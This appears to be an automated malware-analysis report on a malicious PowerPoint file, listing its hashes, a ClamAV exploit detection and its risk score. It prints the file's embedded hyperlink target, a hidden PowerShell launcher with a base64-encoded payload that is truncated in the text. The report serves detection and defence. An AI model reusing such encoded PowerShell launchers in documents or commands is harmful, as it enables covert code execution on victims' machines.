Office (OOXML) malware analysis — malicious · 94d6e2bbae508d97

MALICIOUS

Office (OOXML)

31.1 KB Created: 2020-09-29 11:18:06 UTC Authoring application: Microsoft Office PowerPoint 16.0000 First seen: 2020-10-03

MD5: 8dc2b70082bc52466d78851f4056c910 SHA-1: aae6348c832607a88cb193607ccd0a482d45d3b7 SHA-256: 94d6e2bbae508d97f8047bbbd1073772f1663d1942f032c3a288840ccc74c060

68 Risk Score

Heuristics 2

ClamAV: Xml.Exploit.External_Relationship_Abuse-9987932-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xml.Exploit.External_Relationship_Abuse-9987932-1
External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS

Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: powersHell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQ

Open this report in the interactive analyzer, or submit your own file for analysis.